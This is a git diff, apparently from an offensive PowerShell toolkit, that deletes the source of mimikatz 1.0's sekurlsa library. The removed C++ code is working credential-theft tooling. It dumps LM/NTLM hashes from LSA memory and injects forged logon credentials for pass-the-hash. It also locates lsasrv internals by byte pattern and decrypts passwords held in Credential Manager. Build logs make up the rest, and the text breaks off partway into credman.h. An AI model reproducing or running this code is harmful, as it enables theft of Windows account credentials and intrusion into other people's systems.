Diffstat (limited to 'Exfiltration/mimikatz-1.0/librairies/sekurlsa')
35 files changed, 0 insertions, 1771 deletions
| diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp deleted file mode 100644 index b429e5a..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp +++ /dev/null 
@@ -1,153 +0,0 @@ -/*	Benjamin DELPY `gentilkiwi` -	http://blog.gentilkiwi.com -	benjamin@gentilkiwi.com -	Licence    : http://creativecommons.org/licenses/by/3.0/fr/ -	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "msv1_0.h" - -bool searchMSVFuncs() -{ -	if(!MSV1_0_MspAuthenticationPackageId) -			MSV1_0_MspAuthenticationPackageId = (mod_system::GLOB_Version.dwBuildNumber < 7000) ? 2 : 3; -	return (searchLSAFuncs() && (MSV1_0_MspAuthenticationPackageId != 0)); -} - -bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity) -{ -	wostringstream maReponse; -	if(searchMSVFuncs()) -	{ -		unsigned short reservedSize = 0; -		PMSV1_0_PRIMARY_CREDENTIAL kiwiCreds = NULL; -		if(NT_SUCCESS(NlpGetPrimaryCredential(logId, &kiwiCreds, &reservedSize))) -		{ -			wstring lmHash = mod_text::stringOfHex(kiwiCreds->LmOwfPassword, sizeof(kiwiCreds->LmOwfPassword)); -			wstring ntHash = mod_text::stringOfHex(kiwiCreds->NtOwfPassword, sizeof(kiwiCreds->NtOwfPassword)); - -			if(justSecurity) -				maReponse << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }"; -			else -			{ -				maReponse << endl << -					L"\t * Utilisateur  : " << mod_text::stringOfSTRING(kiwiCreds->UserName) << endl << -					L"\t * Domaine      : " << mod_text::stringOfSTRING(kiwiCreds->LogonDomainName) << endl << -					L"\t * Hash LM      : " << lmHash << endl << -					L"\t * Hash NTLM    : " << ntHash; -			} -			SeckPkgFunctionTable->FreeLsaHeap(kiwiCreds); -		} -		else maReponse << L"n.t. (LUID KO)"; -	} -	else maReponse << L"n.a. 
(msv KO)"; - -	return sendTo(monPipe, maReponse.str()); -} - -__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ -	vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider; -	monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getMSVLogonData, wstring(L"msv1_0"))); -	return getLogonData(monPipe, mesArguments, &monProvider); -} - -__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ -	wostringstream maReponse; -	if(searchMSVFuncs()) -	{ -		if(!mesArguments->empty() && mesArguments->size() >= 1 && mesArguments->size() <= 2) -		{ -			wstring idSecAppHigh = L"0"; -			wstring idSecAppLow = mesArguments->front(); -			if(mesArguments->size() > 1) -			{ -				idSecAppHigh = mesArguments->front(); idSecAppLow = mesArguments->back(); -			} - -			LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow); -			if(idApp.LowPart != 0 || idApp.HighPart != 0) -				maReponse << (NT_SUCCESS(NlpDeletePrimaryCredential(&idApp)) ? L"Suppression des données de sécurité réussie :)" : L"Suppression des données de sécurité en échec :("); -			else maReponse << L"LUID incorrect !"; -		} -		else maReponse << L"Format d\'appel invalide : delLogonSession [idSecAppHigh] idSecAppLow"; -	} -	else maReponse << L"n.a. 
(msv KO)"; - -	maReponse << endl; -	return sendTo(monPipe, maReponse.str()); -} - -__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ -	wostringstream maReponse; -	if(searchMSVFuncs()) -	{ -		if(!mesArguments->empty() && mesArguments->size() >= 4 && mesArguments->size() <= 6) -		{ -			MSV1_0_PRIMARY_CREDENTIAL kiwicreds; -			RtlZeroMemory(&kiwicreds, sizeof(MSV1_0_PRIMARY_CREDENTIAL)); -			 -			wstring idSecAppHigh = L"0", idSecAppLow, userName, domainName, lmHash, ntlmHash = mesArguments->back(); -			kiwicreds.LmPasswordPresent = FALSE; -			kiwicreds.NtPasswordPresent = TRUE; - -			switch(mesArguments->size()) // méchants arguments utilisateurs -			{ -			case 4: -				idSecAppLow = mesArguments->front(); -				userName = mesArguments->at(1); -				domainName = mesArguments->at(2); -				break; -			case 6: -				idSecAppHigh = mesArguments->front(); -				idSecAppLow = mesArguments->at(1); -				userName = mesArguments->at(2); -				domainName = mesArguments->at(3); -				kiwicreds.LmPasswordPresent = TRUE; -				lmHash = mesArguments->at(4); -				break; -			case 5: -				if(mesArguments->at(3).size() == 0x20) -				{ -					idSecAppLow = mesArguments->front(); -					userName = mesArguments->at(1); -					domainName = mesArguments->at(2); -					kiwicreds.LmPasswordPresent = TRUE; -					lmHash = mesArguments->at(3); -				} -				else -				{ -					idSecAppHigh = mesArguments->front(); -					idSecAppLow = mesArguments->at(1); -					userName = mesArguments->at(2); -					domainName = mesArguments->at(3); -				} -				break; -			} - -			LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow); - -			if(idApp.LowPart != 0 || idApp.HighPart != 0) -			{ -				if((!kiwicreds.LmPasswordPresent || (lmHash.size() == 0x20)) && ntlmHash.size() == 0x20 && userName.size() <= MAX_USERNAME_LEN && domainName.size() <= MAX_DOMAIN_LEN) -				{ -					mod_text::InitLsaStringToBuffer(&kiwicreds.UserName, userName, kiwicreds.BuffUserName); -					
mod_text::InitLsaStringToBuffer(&kiwicreds.LogonDomainName, domainName, kiwicreds.BuffDomaine); -					if(kiwicreds.LmPasswordPresent) -						mod_text::wstringHexToByte(lmHash, kiwicreds.LmOwfPassword); -					mod_text::wstringHexToByte(ntlmHash, kiwicreds.NtOwfPassword); - -					maReponse << (NT_SUCCESS(NlpAddPrimaryCredential(&idApp, &kiwicreds, sizeof(kiwicreds))) ? L"Injection de données de sécurité réussie :)" : L"Injection de données de sécurité en échec :("); -				} -				else maReponse << L"Les hashs LM et NTLM doivent faire 32 caractères, le nom d\'utilisateur et le domaine/poste au maximum 22 caractères"; -			} -			else maReponse << L"LUID incorrect !"; -		} -		else maReponse << L"Format d\'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur {Domaine|Poste} [HashLM] HashNTLM"; -	} -	else maReponse << L"n.a. (msv KO)"; - -	maReponse << endl; -	return sendTo(monPipe, maReponse.str()); -} diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h deleted file mode 100644 index 4749573..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h +++ /dev/null @@ -1,16 +0,0 @@ -/*	Benjamin DELPY `gentilkiwi` -	http://blog.gentilkiwi.com -	benjamin@gentilkiwi.com -	Licence    : http://creativecommons.org/licenses/by/3.0/fr/ -	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../sekurlsa.h" -#include "msv1_0_helper.h" - -bool searchMSVFuncs(); -bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity); - -__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments); 
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp
deleted file mode 100644
index 7ccb8e5..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp
+++ /dev/null
@@ -1,53 +0,0 @@ -/*	Benjamin DELPY `gentilkiwi` -	http://blog.gentilkiwi.com -	benjamin@gentilkiwi.com -	Licence    : http://creativecommons.org/licenses/by/3.0/fr/ -	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "msv1_0_helper.h" -DWORD MSV1_0_MspAuthenticationPackageId = 0; - -void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative) -{ -	if(String->Buffer) -		String->Buffer = reinterpret_cast<wchar_t *>(reinterpret_cast<ULONG_PTR>(String->Buffer) + ((relative ? -1 : 1) * reinterpret_cast<ULONG_PTR>(BaseAddress))); -} - -NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short CredentialSize) -{ -	STRING PrimaryKeyValue, CredentialString; -	mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); - -	NlpMakeRelativeOrAbsoluteString(Credential, &Credential->UserName); -	NlpMakeRelativeOrAbsoluteString(Credential, &Credential->LogonDomainName); -	CredentialString.Buffer = reinterpret_cast<char *>(Credential); -	CredentialString.MaximumLength = CredentialString.Length = CredentialSize; -	SeckPkgFunctionTable->LsaProtectMemory(CredentialString.Buffer, CredentialString.Length); -	return SeckPkgFunctionTable->AddCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue, &CredentialString ); -} - -NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize) -{ -	ULONG QueryContext = 0, PrimaryKeyLength; -	STRING PrimaryKeyValue, CredentialString; -	mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); -			 -	NTSTATUS retour = SeckPkgFunctionTable->GetCredentials(LogonId, MSV1_0_MspAuthenticationPackageId, &QueryContext, FALSE, &PrimaryKeyValue, &PrimaryKeyLength, &CredentialString); -	if(NT_SUCCESS(retour)) -	{ -		SeckPkgFunctionTable->LsaUnprotectMemory(CredentialString.Buffer, CredentialString.Length); -		*Credential = (PMSV1_0_PRIMARY_CREDENTIAL) 
CredentialString.Buffer; -		NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->UserName), false); -		NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->LogonDomainName), false); -		if (CredentialSize) -			*CredentialSize = CredentialString.Length; -	} -	return retour; -} - -NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId) -{ -	STRING PrimaryKeyValue; -	mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); -	return SeckPkgFunctionTable->DeleteCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue); -}
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h
deleted file mode 100644
index e9afd03..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h
+++ /dev/null
@@ -1,28 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
-	benjamin@gentilkiwi.com
-	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
-	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../sekurlsa.h"
-
-#define MSV1_0_PRIMARY_KEY "Primary" 
-extern DWORD MSV1_0_MspAuthenticationPackageId;
-
-typedef struct _MSV1_0_PRIMARY_CREDENTIAL { 
-	LSA_UNICODE_STRING LogonDomainName; 
-	LSA_UNICODE_STRING UserName; 
-	BYTE NtOwfPassword[0x10];
-	BYTE LmOwfPassword[0x10];
-	BOOLEAN NtPasswordPresent; 
-	BOOLEAN LmPasswordPresent;
-	wchar_t BuffDomaine[MAX_DOMAIN_LEN];
-	wchar_t BuffUserName[MAX_USERNAME_LEN];
-} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL; 
-
-void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative = true);
-
-NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short  CredentialSize);  
-NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize);
-NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId);
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog
Binary files differ
deleted file mode 100644
index af1843d..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog
+++ /dev/null
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog
Binary files differ
deleted file mode 100644
index 065c191..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog
+++ /dev/null
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog
Binary files differ
deleted file mode 100644
index 662e27d..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog
+++ /dev/null
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog
deleted file mode 100644
index 46b134b..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog
+++ /dev/null
@@ -1 +0,0 @@
-ÿþ
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog
deleted file mode 100644
index 46b134b..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog
+++ /dev/null
@@ -1 +0,0 @@
-ÿþ
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog
Binary files differ
deleted file mode 100644
index 8bfc485..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog
+++ /dev/null
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog
Binary files differ
deleted file mode 100644
index a090f02..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog
+++ /dev/null
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog
Binary files differ
deleted file mode 100644
index 3c62e5a..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog
+++ /dev/null
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog
Binary files differ
deleted file mode 100644
index a61d64e..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog
+++ /dev/null
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog
Binary files differ
deleted file mode 100644
index c2411f0..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog
+++ /dev/null
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog
Binary files differ
deleted file mode 100644
index 0c67d61..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog
+++ /dev/null
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog
Binary files differ
deleted file mode 100644
index 52d7b3d..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog
+++ /dev/null
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog
Binary files differ
deleted file mode 100644
index 465eb7a..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog
+++ /dev/null
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog
Binary files differ
deleted file mode 100644
index 9befde9..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog
+++ /dev/null
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest
deleted file mode 100644
index ecea6f7..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest
+++ /dev/null
@@ -1,10 +0,0 @@
-<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
-<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
-  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
-    <security>
-      <requestedPrivileges>
-        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
-      </requestedPrivileges>
-    </security>
-  </trustInfo>
-</assembly>
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate
deleted file mode 100644
index 4d28193..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate
+++ /dev/null
@@ -1,2 +0,0 @@
-#v4.0:v100
-Release|Win32|C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\|
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res
Binary files differ
deleted file mode 100644
index d0ba1dd..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res
+++ /dev/null
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog
deleted file mode 100644
index 929c472..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog
+++ /dev/null
@@ -1,5 +0,0 @@
-^C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\librairies\sekurlsa\sekurlsa.vcxproj
-C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.lib
-C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.lib
-C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.exp
-C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.exp
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp
deleted file mode 100644
index fe846b4..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp
+++ /dev/null
@@ -1,180 +0,0 @@ -/*	Benjamin DELPY `gentilkiwi` -	http://blog.gentilkiwi.com -	benjamin@gentilkiwi.com -	Licence    : http://creativecommons.org/licenses/by/3.0/fr/ -	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "credman.h" - -PCRED_I_ENUMERATE CredIEnumerate = NULL; - -bool searchCredmanFuncs() -{ -#ifdef _M_X64 -	BYTE PTRN_WIN5_CrediEnumerate[]	= {0x48, 0x8b, 0xc4, 0x48, 0x81, 0xec, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x70, 0xe8, 0x48, 0x89, 0x78, 0xe0, 0x4c, 0x89, 0x60, 0xd8, 0x45, 0x33, 0xe4}; -	LONG OFFS_WIN5_CrediEnumerate	= 0; -	BYTE PTRN_WNO8_CrediEnumerate[]	= {0x48, 0x81, 0xec, 0xd0, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xed}; -	LONG OFFS_WNO8_CrediEnumerate	= -22; -	BYTE PTRN_WIN8_CrediEnumerate[]	= {0x48, 0x81, 0xec, 0xe0, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xed}; -	LONG OFFS_WIN8_CrediEnumerate	= -30; -#elif defined _M_IX86 -	BYTE PTRN_WIN5_CrediEnumerate[]	= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x24, 0x53, 0x33, 0xdb, 0x57, 0x33, 0xc0}; -	BYTE PTRN_WN60_CrediEnumerate[]	= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x40, 0x33, 0xc9}; -	BYTE PTRN_WN61_CrediEnumerate[]	= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x44, 0x33, 0xc0}; -	BYTE PTRN_WN62_CrediEnumerate[]	= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x80, 0x00, 0x00, 0x00, 0x33, 0xc0}; -	LONG OFFS_WALL_CrediEnumerate	= 0; -#endif - -	if(!CredIEnumerate) -	{ -		PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; -#ifdef _M_X64 -		if(mod_system::GLOB_Version.dwMajorVersion < 6) -		{ -			pattern	= PTRN_WIN5_CrediEnumerate; -			taille	= sizeof(PTRN_WIN5_CrediEnumerate); -			offset	= OFFS_WIN5_CrediEnumerate; -		} -		else -		{ -			if (mod_system::GLOB_Version.dwMinorVersion < 2) -			{ -				pattern	= PTRN_WNO8_CrediEnumerate; -				taille	= sizeof(PTRN_WNO8_CrediEnumerate); -				offset	= OFFS_WNO8_CrediEnumerate; -			} -			else -			{ -				pattern	= PTRN_WIN8_CrediEnumerate; -				taille	= sizeof(PTRN_WIN8_CrediEnumerate); -				offset	= 
OFFS_WIN8_CrediEnumerate; -			} -		} -#elif defined _M_IX86 -		if(mod_system::GLOB_Version.dwMajorVersion < 6) -		{ -			pattern	= PTRN_WIN5_CrediEnumerate; -			taille	= sizeof(PTRN_WIN5_CrediEnumerate); -		} -		else -		{ -			if(mod_system::GLOB_Version.dwMinorVersion < 1) -			{ -				pattern	= PTRN_WN60_CrediEnumerate; -				taille	= sizeof(PTRN_WN60_CrediEnumerate); -			} -			else if (mod_system::GLOB_Version.dwMinorVersion < 2) -			{ -				pattern	= PTRN_WN61_CrediEnumerate; -				taille	= sizeof(PTRN_WN61_CrediEnumerate); -			} -			else -			{ -				pattern	= PTRN_WN62_CrediEnumerate; -				taille	= sizeof(PTRN_WN62_CrediEnumerate); -			} -		} -		offset = OFFS_WALL_CrediEnumerate; -#endif -		mod_memory::genericPatternSearch(reinterpret_cast<PBYTE *>(&CredIEnumerate), L"lsasrv", pattern, taille, offset, NULL, true, true); -	} -	return (searchLSAFuncs() && CredIEnumerate); -} - -__kextdll bool __cdecl getCredmanFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ -	wostringstream monStream; -	monStream << L"** lsasrv.dll ** ; Statut recherche : " << (searchCredmanFuncs() ? L"OK :)" : L"KO :(") << endl << endl << -		L"@CredIEnumerate     = " << CredIEnumerate << endl << -		L"@LsaUnprotectMemory = " << SeckPkgFunctionTable->LsaUnprotectMemory << endl; -	return sendTo(monPipe, monStream.str()); -} - -__kextdll bool __cdecl getCredman(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ -	vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider; -	monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getCredmanData, wstring(L"credman"))); -	return getLogonData(monPipe, mesArguments, &monProvider); -} - -bool WINAPI getCredmanData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity) -{ -	wostringstream message; -	if(searchCredmanFuncs()) -	{ -		DWORD credNb = 0; -		PCREDENTIAL * pCredential = NULL; -		DWORD CredIEnumerateFlags = (mod_system::GLOB_Version.dwMajorVersion < 6) ? 
0 : CRED_ENUMERATE_ALL_CREDENTIALS; -		NTSTATUS status = (mod_system::GLOB_Version.dwBuildNumber < 8000 ) ? CredIEnumerate(logId, 0, NULL, CredIEnumerateFlags, &credNb, &pCredential) : reinterpret_cast<PCRED_I_ENUMERATE62>(CredIEnumerate)(logId, NULL, CredIEnumerateFlags, &credNb, &pCredential); - -		if(NT_SUCCESS(status)) -		{ -			for(DWORD i = 0; i < credNb; i++) -			{ -				wstring Target(pCredential[i]->TargetName); -				wstring ShortTarget = (mod_system::GLOB_Version.dwMajorVersion < 6) ? Target : Target.substr(Target.find_first_of(L'=') + 1); -					 -				message << endl; -				if(justSecurity) -					message << L"\t [" << i << L"] " << Target << L'\t'; -				else message << -					L"\t * [" << i << L"] Target   : " << Target << L" / " << (pCredential[i]->TargetAlias ? pCredential[i]->TargetAlias : L"<NULL>") << endl << -					L"\t * [" << i << L"] Comment  : " << (pCredential[i]->Comment ? pCredential[i]->Comment : L"<NULL>") << endl << -					L"\t * [" << i << L"] User     : " << (pCredential[i]->UserName ? 
pCredential[i]->UserName : L"<NULL>") << endl; -					 -				if((pCredential[i]->Type != CRED_TYPE_GENERIC) && (pCredential[i]->Type != CRED_TYPE_GENERIC_CERTIFICATE)) -				{ -					CREDENTIAL_TARGET_INFORMATION mesInfos = {const_cast<wchar_t *>(ShortTarget.c_str()), NULL, NULL, NULL, NULL, NULL, NULL, pCredential[i]->Flags, 0 , NULL}; -					DWORD dwNbCredentials; -					PENCRYPTED_CREDENTIALW * pEncryptedCredential; -					NTSTATUS status = SeckPkgFunctionTable->CrediReadDomainCredentials(logId, CREDP_FLAGS_IN_PROCESS, &mesInfos, 0, &dwNbCredentials, &pEncryptedCredential); -					if(status == STATUS_INVALID_PARAMETER) -					{ -						mesInfos.Flags |= CRED_TI_USERNAME_TARGET; -						status = SeckPkgFunctionTable->CrediReadDomainCredentials(logId, CREDP_FLAGS_IN_PROCESS, &mesInfos, 0, &dwNbCredentials, &pEncryptedCredential); -					} -					if(NT_SUCCESS(status)) -					{ -						for(DWORD j = 0; j < dwNbCredentials ; j++) -						{ -							wostringstream prefix; prefix << L"[" << j << L"] "; -							message << descEncryptedCredential(pEncryptedCredential[j], justSecurity, prefix.str()); -						} -						SeckPkgFunctionTable->CrediFreeCredentials(dwNbCredentials, pEncryptedCredential); -					} -					else message << L"Erreur CrediReadDomainCredentials : " << mod_system::getWinError(false, status); -				} -				else -				{ -					PENCRYPTED_CREDENTIALW pEncryptedCredential; -					NTSTATUS status = SeckPkgFunctionTable->CrediRead(logId, CREDP_FLAGS_IN_PROCESS, const_cast<wchar_t *>(ShortTarget.c_str()), pCredential[i]->Type, 0, &pEncryptedCredential); -					if(NT_SUCCESS(status)) -					{ -						message << descEncryptedCredential(pEncryptedCredential, justSecurity); -						CredFree(pEncryptedCredential); -					} -					else message << L"Erreur CrediRead : " << mod_system::getWinError(false, status); -				} -			} -			CredFree(pCredential); -		} -		else message << L"CredIEnumerate KO : " << mod_system::getWinError(false, status); -	} else message << L"n.a. 
(credman KO)"; -	return sendTo(monPipe, message.str()); -} - -wstring descEncryptedCredential(PENCRYPTED_CREDENTIALW pEncryptedCredential, __in bool justSecurity, wstring prefix) -{ -	wostringstream monStream; - -	LSA_UNICODE_STRING encryptedPassword = {pEncryptedCredential->Cred.CredentialBlobSize, pEncryptedCredential->Cred.CredentialBlobSize, reinterpret_cast<PWSTR>(pEncryptedCredential->Cred.CredentialBlob)}; -	wstring cred = getPasswordFromProtectedUnicodeString(&encryptedPassword); -							 -	if(justSecurity) -		monStream << L"- {" << pEncryptedCredential->Cred.UserName << L" ; " << cred << L" } "; -	else monStream << -			L"\t       " << prefix << L"User : " << pEncryptedCredential->Cred.UserName << endl << -			L"\t       " << prefix << L"Cred : " << cred << endl; -					 -	return monStream.str(); -}
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h
deleted file mode 100644
index 60d1249..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h
+++ /dev/null
@@ -1,19 +0,0 @@
-/*	Benjamin DELPY `gentilkiwi`
-	http://blog.gentilkiwi.com
